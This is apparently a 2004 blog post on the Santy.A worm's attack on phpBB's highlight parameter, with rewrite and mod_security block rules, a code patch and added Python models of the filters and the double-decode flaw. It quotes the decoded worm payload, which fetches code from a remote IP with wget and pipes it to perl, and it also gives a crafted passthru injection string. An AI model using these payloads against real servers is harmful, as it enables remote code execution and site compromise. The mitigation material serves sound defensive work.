Tuesday, December 21, 2004

phpBB critical security issue

There is currently a worm spreading around the Internet, scanning for vulnerable phpBB-based message boards. All previous versions are affected unless patched, except for the latest version, which is 2. There may well be some manual exploitation taking place, but mainly this issue is being exploited by a worm called Santy.A, which is also known by a few other names.

I have heard of quite a few boards that have had content modified, and because of this worm's payload it has also been modifying HTML documents and images, among other files. Exploiting the issue lets the worm write a Perl script to a file on the server and then run it, which applies the rest of the payload and starts the worm scanning for other vulnerable phpBB boards to compromise.

Aside from applying a patch or upgrading, there are a few other measures that some people have implemented which could stop the worm's attack before boards are updated; this is handy if you run a server with a lot of sites running older versions of phpBB.

Creating a rewrite rule such as the following should provide a quick fix:

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
RewriteRule ^.*$ - [F]

Or if you use mod_security in Apache you could use the following:

SecFilterSelective "THE_REQUEST" "(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("
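As an added illustration (not code from the original post), the following Python applies the two rules above to a few constructed request lines of the kind an access log would hold. The RewriteCond patterns ^(.*)echr(.*) and ^(.*)esystem(.*) on %{QUERY_STRING} are in effect plain substring tests on the raw, still percent-encoded query string, which is why "esystem" catches a doubly-encoded ".system(" (the encoded dot %252e ends in the letter e); the mod_security filter is a regex over the whole request line. The sample lines are constructed here, not captured worm traffic, and the worm-style line simply mimics the shape the rules are written to catch.

```python
import re

# mod_rewrite conditions from the post: ^(.*)echr(.*) and ^(.*)esystem(.*)
# on %{QUERY_STRING} reduce to substring tests on the raw query string.
REWRITE_SUBSTRINGS = ("echr", "esystem")

# mod_security filter from the post, applied to THE_REQUEST (the request line).
MODSEC_PATTERN = re.compile(
    r"(system|exec|passthru|popen|shell_exec|proc_open|fopen|fwrite)\s*\("
)

# Constructed sample request lines (not real captured traffic).
SAMPLE_REQUESTS = [
    # worm-style probe: doubly-encoded quote and ".system(" in the highlight value
    "GET /viewtopic.php?t=1&highlight=%2527%252esystem(x)%252e%2527 HTTP/1.0",
    # an ordinary board search whose word happens to contain the substring "esystem"
    "GET /viewtopic.php?t=42&highlight=thesystem HTTP/1.1",
    # an ordinary request that neither rule touches
    "GET /viewtopic.php?t=7&highlight=phpbb HTTP/1.1",
]


def query_string(request_line):
    """Return the raw, still percent-encoded query string of a request line."""
    parts = request_line.split(" ")
    uri = parts[1] if len(parts) > 1 else ""
    return uri.partition("?")[2]


def rewrite_rule_refuses(request_line):
    """True if the RewriteCond/RewriteRule pair would answer 403 (the [F] flag).
    RewriteCond is case-sensitive without [NC], so plain substring tests match it."""
    qs = query_string(request_line)
    return any(s in qs for s in REWRITE_SUBSTRINGS)


def modsec_filter_refuses(request_line):
    """True if the SecFilterSelective pattern matches the request line."""
    return MODSEC_PATTERN.search(request_line) is not None


def evaluate(request_lines=SAMPLE_REQUESTS):
    """Return (rewrite_refuses, modsec_refuses) for each request line, in order."""
    return [(rewrite_rule_refuses(r), modsec_filter_refuses(r)) for r in request_lines]


if __name__ == "__main__":
    for line, (rw, ms) in zip(SAMPLE_REQUESTS, evaluate()):
        print(f"rewrite={rw!s:5} modsec={ms!s:5} {line}")
```

Running it shows the trade-off between the two approaches: the rewrite rule refuses both the worm-style line and the innocent search for "thesystem", because a bare substring cannot tell them apart, while the mod_security filter only fires when a listed function name is followed by an opening parenthesis. Either is a stop-gap until the board is patched, not a replacement for the fix.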

Some work has already been done to decode the payload, which has been reported as:

rush=echo _START_; cd /tmp;wget 128.174.137.230/bn -O .b; perl -pe y/thmvdw0987654321uoiea/aeiou1234567890wdvthm/ .b| perl; rm -f .b *.pl b0t*; echo _END_
highlight='.passthru($HTTP_GET_VARS[rush]).'

If you don't want to upgrade, modifying the following code in the file viewtopic.php will resolve the issue:

$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
    // Split words and phrases
    $words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));

    for($i = 0; $i < sizeof($words); $i++)
    {

Replace with:

$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
    // Split words and phrases
    $words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));

    for($i = 0; $i < sizeof($words); $i++)
    {
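To show why dropping urldecode() is what closes the hole, here is an added Python model of the highlight handling (not phpBB's code and not from the original post). It replays what happens to the query value before viewtopic.php splits it into words: the web server decodes the query string once; PHP's magic_quotes_gpc, assumed On here as was common on phpBB hosts of the time, backslash-escapes quotes; the original code then ran urldecode() a second time before htmlspecialchars(), which with its default flags leaves single quotes untouched. A doubly-encoded %2527 passes the first decode and the quote escaping as the harmless text %27 and only becomes a bare ' in the second decode; the replacement code never performs that second decode, so the text stays as %27. The payload constant is the post's reported payload re-encoded for this model.

```python
import re
from urllib.parse import unquote

# The decoded payload quoted in the post, in the doubly-encoded form it would
# need on the wire to pass one decode as harmless text (constructed here).
DOUBLY_ENCODED_PAYLOAD = "%2527.passthru(%2524HTTP_GET_VARS%255Brush%255D).%2527"


def magic_quotes_gpc(value):
    """Model of PHP's magic_quotes_gpc=On (addslashes applied to each GET value)."""
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"'))


def htmlspecialchars(value):
    """PHP htmlspecialchars() with default flags: & < > and the double quote are
    escaped; the single quote is left alone."""
    return (value.replace("&", "&amp;")
                 .replace("<", "&lt;")
                 .replace(">", "&gt;")
                 .replace('"', "&quot;"))


def highlight_value(raw_query_value, vulnerable, magic_quotes=True):
    """Return the string viewtopic.php would go on to split into words.

    raw_query_value is the value exactly as it appears in the request line.
    vulnerable=True reproduces the order in the original code (extra urldecode);
    vulnerable=False reproduces the replacement code from the post.
    magic_quotes=True is an assumption about the host's PHP configuration.
    """
    value = unquote(raw_query_value)        # the web server's single decode
    if magic_quotes:
        value = magic_quotes_gpc(value)     # quotes present now get a backslash
    if vulnerable:
        value = unquote(value)              # the second decode that the fix removes
    return htmlspecialchars(value).strip()


def has_unescaped_single_quote(text):
    """True if a single quote not preceded by a backslash survives sanitising."""
    return re.search(r"(?<!\\)'", text) is not None


if __name__ == "__main__":
    for vulnerable in (True, False):
        out = highlight_value(DOUBLY_ENCODED_PAYLOAD, vulnerable)
        label = "original order:" if vulnerable else "fixed order:   "
        verdict = "bare quote survives" if has_unescaped_single_quote(out) else "inert"
        print(label, out, "->", verdict)
```

With the original order the model returns exactly the decoded payload the post quotes, quote intact; with the replacement code the same request yields an inert %27. A singly-encoded %27 is neutralised by the quote escaping in both orders, which is why the worm had to encode twice.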

A lot of sites have already been defaced, which is another good reason to keep a recent backup in addition to keeping up to date on security issues and applying the appropriate patches.

Post ID: 603, posted by jase at 11:51 PM